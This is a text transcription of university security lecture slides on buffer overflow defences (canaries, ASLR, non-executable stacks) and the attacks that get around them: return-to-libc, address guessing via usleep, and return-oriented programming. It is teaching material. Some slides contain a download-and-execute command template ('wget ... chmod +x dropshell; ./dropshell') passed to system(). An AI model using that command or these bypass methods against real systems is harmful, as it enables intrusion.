BUFFER OVERFLOW DEFENSES & COUNTERMEASURES
Size: px
Start display at page:

Download "BUFFER OVERFLOW DEFENSES & COUNTERMEASURES"

Transcription

1 BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB

2 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess the raw address) Getting to point to our code (dist buff to stored eip)

3 DETECTING OVERFLOWS WITH CANARIES text %ebp &arg1 buffer

4 DETECTING OVERFLOWS WITH CANARIES text %ebp &arg1 buffer

5 DETECTING OVERFLOWS WITH CANARIES text d e2 10 %ebp &arg1 buffer canary

6 DETECTING OVERFLOWS WITH CANARIES text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary

7 DETECTING OVERFLOWS WITH CANARIES text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary

8 DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary

9 DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary What value should the canary have?

10 CANARY VALUES From StackGuard [Wagle & Cowan] 1. Terminator canaries (CR, LF, NULL, -1) Leverages the fact that scanf etc. don t allow these 2. Random canaries Write a new random each process start Save the real value somewhere in memory Must write-protect the stored value 3. Random XOR canaries Same as random canaries But store canary XOR some control info, instead

11 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Option: Make this detectable with canaries Finding the return address (guess the raw address) Getting to point to our code (dist buff to stored eip)

12 ADDRESS SPACE LAYOUT RANDOMIZATION 4G Set when process starts Runtime cmdline & env Stack Heap 0xffffffff int f() { int x; malloc(sizeof(long)); Known at compile time Uninit d data static int x; Init d data Text static const int y=10; 0 0x Randomize where exactly these regions start

13 ADDRESS SPACE LAYOUT RANDOMIZATION Shortcomings of ASLR Introduces return-to-libc atk Probes for location of usleep On 32-bit architectures, only 16 bits of entropy fork() keeps same offsets

14 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Option: Make this detectable with canaries Finding the return address (guess the raw address) Address Space Layout Randomization (ASLR) Getting to point to our code (dist buff to stored eip)

15 GETTING %EIP TO POINT TO OUR CODE Recall that all memory has Read, Write, and Execute permissions 4G cmdline & env 0xffffffff Must be readable & writeable Stack Heap But does it need to be executable? Must be executable 0 Uninit d data Init d data Text Basic idea: make the stack non-executable 0x

16 RETURN TO LIBC Exploit:

17 RETURN TO LIBC Exploit: Preferred: strlcpy char buf[4]; strncpy(buf, hello!, sizeof(buf)); strlcpy(buf, hello!, sizeof(buf)); buf = { h, e, l, l } buf = { h, e, l, \0 }

18 RETURN TO LIBC Exploit: Goal: system( wget ; chmod +x dropshell ;./dropshell ); Challenge: Non-executable stack Insight: system already exists somewhere in libc

19 RETURN TO LIBC text %ebp &arg buffer stack frame

20 RETURN TO LIBC padding text %ebp &arg xbdf 0xbdf xbdf... buffer stack frame

21 RETURN TO LIBC padding good guess text %ebp &arg xbdf 0xbdf xbdf... buffer stack frame

22 RETURN TO LIBC padding good guess nop sled text %ebp &arg xbdf 0xbdf xbdf... nop nop nop buffer stack frame

23 RETURN TO LIBC padding good guess nop sled malicious code text %ebp &arg xbdf 0xbdf xbdf... nop nop nop \x0f \x3c \x2f... buffer stack frame

24 RETURN TO LIBC padding good guess nop sled malicious code text %ebp &arg xbdf 0xbdf xbdf... nop nop nop \x0f \x3c \x2f... buffer stack frame

25 RETURN TO LIBC padding good guess nop sled malicious code text %ebp &arg xbdf 0xbdf xbdf... nop nop nop \x0f \x3c \x2f... buffer stack frame PANIC: address not executable

26 RETURN TO LIBC libc... usleep() printf()... system()... text %ebp &arg buffer

27 RETURN TO LIBC libc... usleep() printf()... system()... padding text %ebp &arg buffer

28 RETURN TO LIBC libc... usleep() printf()... system()... padding text %ebp &arg buffer

29 RETURN TO LIBC libc... usleep() printf()... system()... padding arguments text %ebp &arg buffer wget example.com/...

30 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg buffer wget example.com/...

31 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg wget example.com/... buffer How do we ensure these are the args?

32 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp &arg1 buffer wget example.com/... %esp %ebp leave: mov %ebp %esp pop %ebp ret: pop

33 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp &arg1 buffer wget example.com/... %esp %ebp leave: mov %ebp %esp pop %ebp ret: pop

34 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 buffer wget example.com/... %esp %ebp leave: mov %ebp %esp pop %ebp ret: pop

35 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 buffer wget example.com/... %ebp leave: mov %ebp %esp pop %ebp %esp ret: pop

36 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 buffer wget example.com/... %ebp%esp leave: mov %ebp %esp pop %ebp ret: pop

37 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: ret: At this point, we can t reliably access local variables mov %ebp %esp pop %ebp pop

38 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: ret: At this point, we can t reliably access local variables mov %ebp %esp pop %ebp pop

39 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: mov %ebp %esp pop %ebp ret: pop

40 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: mov %ebp %esp pop %ebp ret: pop

41 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 buffer %esp wget example.com/... %ebp

42 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... Will expect args at 8(%ebp) padding arguments text %ebp DEADBEEF DEADBEEF &arg1 buffer %esp wget example.com/... %ebp

43 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 padding buffer %esp wget example.com/... %ebp

44 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 padding buffer wget example.com/... %esp %ebp At this point, we can reliably access local variables

45 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg wget example.com/... buffer How do we ensure these are the args?

46 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg1 padding wget example.com/... buffer How do we ensure these are the args? By prepending 4 byte padding

47 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA buffer 0x

48 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... Repeatedly guess the address of usleep padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA buffer 0x

49 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... Repeatedly guess the address of usleep padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA x buffer 0x = smallest number w/o 0-byte 16 million == 16 sec of sleep Wrong guess of usleep = crash; retry Correct guess of usleep = response in 16 sec

50 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... Repeatedly guess the address of usleep padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA x buffer Why this works Every connection causes a fork; fork() does not re-randomize ASLR 0x = smallest number w/o 0-byte 16 million == 16 sec of sleep Wrong guess of usleep = crash; retry Correct guess of usleep = response in 16 sec

51 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? By first guessing usleep padding arguments text %ebp &arg1 padding wget example.com/... buffer How do we ensure these are the args? By prepending 4 byte padding

52 DEFENSE: JUST GET RID OF SYSTEM()? libc!... usleep() printf()... system()... padding arguments text %ebp &arg1 padding wget example.com/... buffer Idea: Remove any function call that (a) is not needed and (b) could wreak havoc system() exec() connect() open()...

53 RELATED IDEA: SECCOMP-BPF

54 RELATED IDEA: SECCOMP-BPF Linux system call enabled since (2005) Affected process can subsequently only perform read, write, exit, and sigreturn system calls - No support for open call: Can only use already-open file descriptors Isolates a process by limiting possible interactions

55 RELATED IDEA: SECCOMP-BPF Linux system call enabled since (2005) Affected process can subsequently only perform read, write, exit, and sigreturn system calls - No support for open call: Can only use already-open file descriptors Isolates a process by limiting possible interactions Follow-on work produced seccomp-bpf Limit process to policy-specific set of system calls, subject to a policy handled by the kernel - Policy akin to Berkeley Packet Filters (BPF) Used by Chrome, OpenSSH, vsftpd, and others

56 RETURN-ORIENTED PROGRAMMING Shortcomings of removing functions from libc Introduces return-oriented programming Shows that a nontrivial amount of code will have enough code to permit virtually any ROP attack

57 CODE SEQUENCES IN LIBC Code sequences exist in libc that were not placed there by the compiler Find code sequences by starting at ret s ( 0xc3 ) and looking backwards for valid instructions

58 GADGETS leave: ret: mov %ebp %esp pop %ebp pop

59 GADGETS leave: ret: mov %ebp %esp pop %ebp pop

60 GADGETS leave: ret: mov %ebp %esp pop %ebp pop %edx now set to 0xdeadbeef

61 GADGETS leave: ret: mov %ebp %esp pop %ebp pop Effect: sets %edx to 0xdeadbeef

62 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3

63 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3

64 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3

65 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3

66 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3

67 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3

68 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3

69 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3

70 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3

71 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10

72 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10

73 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10

74 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10

75 GADGETS next gadget 7 %edi %edx %eax 7 10

76 GADGETS Effect: adds 7 to %eax next gadget 7 %edi %edx %eax 7 10

77 GADGETS Effect: adds 7 to %eax next gadget Had to deal with the side-effect of push %edi 7 %edi %edx %eax 7 10

78 GADGETS %eax %ebx %ecx %edx

79 GADGETS %eax %ebx %ecx %edx 0

80 GADGETS %eax %ebx %ecx %edx 0

81 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b

82 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b

83 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b

84 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b 0

85 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0

86 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0

87 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0

88 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0

89 GADGETS %eax %ebx %ecx %edx 0xb 0

90 GADGETS %eax %ebx %ecx %edx 0xb 0

91 GADGETS %eax %ebx %ecx %edx 0xb 0

92 GADGETS %eax %ebx %ecx %edx 0xb 0 Effect: shell code

93 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Option: Make this detectable with canaries Getting to point to our code (dist buff to stored eip) Non-executable stack doesn t work so well Finding the return address (guess the raw address) Address Space Layout Randomization (ASLR) Best defense: Good programming practices

94 BUFFER OVERFLOW PREVALENCE Significant percent of all vulnerabilities Data from the National Vulnerability Database

Similar documents

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask This time We will continue Buffer overflows By looking at Overflow Defenses and other memory safety vulnerabilities Everything you ve always wanted to know about gdb but were too afraid to ask Overflow

More information

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts This time We will begin our 1st section: Software Security By investigating Buffer overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Software security

More information

Return-orientated Programming

Return-orientated Programming Return-orientated Programming or The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) Hovav Shacham, CCS '07 Return-Oriented oriented Programming programming

More information

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko CSE 127: Computer Security Control Flow Hijacking Kirill Levchenko October 17, 2017 Control Flow Hijacking Defenses Avoid unsafe functions Stack canary Separate control stack Address Space Layout Randomization

More information

Architecture-level Security Vulnerabilities

Architecture-level Security Vulnerabilities Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:

More information

Lecture 08 Control-flow Hijacking Defenses

Lecture 08 Control-flow Hijacking Defenses Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation

More information

The Geometry of Innocent Flesh on the Bone

The Geometry of Innocent Flesh on the Bone The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop

More information

Biography. Background

Biography. Background From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com

More information

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly Raluca Popa Spring 2018 CS 161 Computer Security Discussion 1 Week of January 22, 2018: GDB and x86 assembly Objective: Studying memory vulnerabilities requires being able to read assembly and step through

More information

Countermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT)

Countermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT) Countermeasures in Modern Operating Systems Yves Younan, Vulnerability Research Team (VRT) Introduction Programs in C/C++: memory error vulnerabilities Countermeasures (mitigations): make exploitation

More information

Architecture-level Security Vulnerabilities. Julian Stecklina

Architecture-level Security Vulnerabilities. Julian Stecklina Architecture-level Security Vulnerabilities Julian Stecklina Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The

More information

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier

More information

Software Security: Buffer Overflow Defenses

Software Security: Buffer Overflow Defenses CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin,

More information

Exploits and gdb. Tutorial 5

Exploits and gdb. Tutorial 5 Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or

More information

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation

More information

From Over ow to Shell

From Over ow to Shell From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:

More information

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated CNIT 127: Exploit Development Ch 1: Before you begin Updated 1-14-16 Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend, such as Denial

More information

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2 Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2 Clemens Hlauschek, Christian Schanes INSO Industrial Software Institute of Information Systems Engineering Faculty of

More information

Practical Malware Analysis

Practical Malware Analysis Practical Malware Analysis Ch 4: A Crash Course in x86 Disassembly Revised 1-16-7 Basic Techniques Basic static analysis Looks at malware from the outside Basic dynamic analysis Only shows you how the

More information

Return Oriented Programming

Return Oriented Programming ROP gadgets Small instruction sequence ending with a ret instruction 0xc3 Gadgets are found in existing, resident code and libraries There exist tools to search for and find gadgets Gadgets are put together

More information

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD

More information

Università Ca Foscari Venezia

Università Ca Foscari Venezia Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2017 CS 161 Computer Security Discussion 2 Question 1 Software Vulnerabilities (15 min) For the following code, assume an attacker can control the value of basket passed into eval basket.

More information

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks Runtime attacks are major threats to today's applications Control-flow of an application is compromised at runtime Typically, runtime attacks include injection of malicious code Reasons for runtime attacks

More information

CSC 405 Computer Security Stack Canaries & ASLR

CSC 405 Computer Security Stack Canaries & ASLR CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses

More information

Is stack overflow still a problem?

Is stack overflow still a problem? Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains

More information

CMSC 313 Lecture 12. Project 3 Questions. How C functions pass parameters. UMBC, CMSC313, Richard Chang

CMSC 313 Lecture 12. Project 3 Questions. How C functions pass parameters. UMBC, CMSC313, Richard Chang Project 3 Questions CMSC 313 Lecture 12 How C functions pass parameters UMBC, CMSC313, Richard Chang Last Time Stack Instructions: PUSH, POP PUSH adds an item to the top of the stack POP

More information

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS) Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed

More information

ROP It Like It s Hot!

ROP It Like It s Hot! Wednesday, December 3, 14 2014 Red Canari, Inc. All rights reserved. 1 I N F O R M AT I O N S E C U R I T Y ROP It Like It s Hot! A 101 on Buffer Overflows, Return Oriented Programming, & Shell- code Development

More information

X86 Stack Calling Function POV

X86 Stack Calling Function POV X86 Stack Calling Function POV Computer Systems Section 3.7 Stack Frame Reg Value ebp xffff FFF0 esp xffff FFE0 eax x0000 000E Memory Address Value xffff FFF8 xffff FFF4 x0000 0004 xffff FFF4 x0000 0003

More information

ISA564 SECURITY LAB. Shellcode. George Mason University

ISA564 SECURITY LAB. Shellcode. George Mason University ISA564 SECURITY LAB Shellcode George Mason University Outline Shellcode Basics Advanced Shellcode What is shellcode? Machine code used as the payload in the exploitation of a software bug Whenever altering

More information

String Oriented Programming Exploring Format String Attacks. Mathias Payer

String Oriented Programming Exploring Format String Attacks. Mathias Payer String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:

More information

Sungkyunkwan University

Sungkyunkwan University November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? July, 1999 Microsoft launches MSN

More information

Advanced Buffer Overflow

Advanced Buffer Overflow Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering

More information

Introduction to Computer Systems , fall th Lecture, Sep. 28 th

Introduction to Computer Systems , fall th Lecture, Sep. 28 th Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0

More information

Buffer Overflow Attack

Buffer Overflow Attack Buffer Overflow Attack What every applicant for the hacker should know about the foundation of buffer overflow attacks By (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 9 5 Abstract Buffer overflow.

More information

Robust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin

Robust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April 16 th,

More information

CMPSC 497: Midterm Review

CMPSC 497: Midterm Review CMPSC 497: Midterm Review Trent Jaeger Systems and Internet Infrastructure Security (SIIS) Lab Computer Science and Engineering Department Pennsylvania State University Page 1 Midterm Format True/False

More information

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) David Aspinall, Informatics @ Edinburgh 24th January 2017 Outline Roadmap Memory corruption vulnerabilities Instant Languages and Runtimes

More information

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security CSE543 - Introduction to Computer and Network Security Module: Return-oriented Programming Professor Trent Jaeger 1 1 Anatomy of Control-Flow Exploits Two steps in control-flow exploitation First -- attacker

More information

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller Lecture 10 Return-oriented programming Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller ROP Overview Idea: We forge shellcode out of existing application

More information

CPEG421/621 Tutorial

CPEG421/621 Tutorial CPEG421/621 Tutorial Compiler data representation system call interface calling convention Assembler object file format object code model Linker program initialization exception handling relocation model

More information

CSE 509: Computer Security

CSE 509: Computer Security CSE 509: Computer Security Date: 2.16.2009 BUFFER OVERFLOWS: input data Server running a daemon Attacker Code The attacker sends data to the daemon process running at the server side and could thus trigger

More information

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins Introduction to Reverse Engineering Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins Reverse Engineering (of Software) What is it? What is it for? Binary exploitation (the cool

More information

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities Secure Programming Lecture 3: Memory Corruption I (introduction) David Aspinall, Informatics @ Edinburgh 24th January 2019 Roadmap: Security in the software lifecycle Security is considered at different

More information

CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING

CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING LECTURE 16, SPRING 2013 TOPICS TODAY Project 6 Perils & Pitfalls of Memory Allocation C Function Call Conventions in Assembly Language PERILS

More information

Writing Exploits. Nethemba s.r.o.

Writing Exploits. Nethemba s.r.o. Writing Exploits Nethemba s.r.o. norbert.szetei@nethemba.com Motivation Basic code injection W^X (DEP), ASLR, Canary (Armoring) Return Oriented Programming (ROP) Tools of the Trade Metasploit A Brief History

More information

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics. Lecture 6B Machine-Level Programming V: Miscellaneous Topics Topics Linux Memory Layout Understanding Pointers Buffer Overflow Upper 2 hex digits of address Red Hat v. 6.2 ~1920MB memory limit FF C0 Used

More information

Smashing the Buffer. Miroslav Štampar

Smashing the Buffer. Miroslav Štampar Smashing the Buffer Miroslav Štampar (mstampar@zsis.hr) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.) Buffer overrun An anomaly where a program, while writing

More information

ANITA S SUPER AWESOME RECITATION SLIDES

ANITA S SUPER AWESOME RECITATION SLIDES ANITA S SUPER AWESOME RECITATION SLIDES 15/18-213: Introduction to Computer Systems Stacks and Buflab, 11 Jun 2013 Anita Zhang, Section M WHAT S NEW (OR NOT) Bomblab is due tonight, 11:59 PM EDT Your late

More information

Assembly Language: Function Calls" Goals of this Lecture"

Assembly Language: Function Calls Goals of this Lecture Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and returning" Passing parameters" Storing local variables" Handling registers without interference"

More information

Topics. What is a Buffer Overflow? Buffer Overflows

Topics. What is a Buffer Overflow? Buffer Overflows Buffer Overflows CSC 482/582: Computer Security Slide #1 Topics 1. What is a Buffer Overflow? 2. The Most Common Implementation Flaw. 3. Process Memory Layout. 4. The Stack and C s Calling Convention.

More information

The first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32.

The first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32. Lab session this afternoon Memory corruption attacks Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) David Aspinall, Informatics @ Edinburgh 2nd February 2016 The first Secure Programming

More information

CSE 127 Computer Security

CSE 127 Computer Security CSE 127 Computer Security Alex Gantman, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on

More information

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call Call without Parameter Value Transfer What are involved? ESP Stack Pointer Register Grows by 4 for EIP (return address) storage Stack -- Memory which holds register contents Will keep the EIP of the next

More information

Assembly Language: Function Calls" Goals of this Lecture"

Assembly Language: Function Calls Goals of this Lecture Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and urning" Passing parameters" Storing local variables" Handling registers without interference"

More information

New York University CSCI-UA : Advanced Computer Systems: Spring 2016 Midterm Exam

New York University CSCI-UA : Advanced Computer Systems: Spring 2016 Midterm Exam New York University CSCI-UA.480-008: Advanced Computer Systems: Spring 2016 Midterm Exam This exam is 75 minutes. Stop writing when time is called. You must turn in your exam; we will not collect it. Do

More information

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016 CS 31: Intro to Systems Functions and the Stack Martin Gagne Swarthmore College February 23, 2016 Reminders Late policy: you do not have to send me an email to inform me of a late submission before the

More information

Return oriented programming

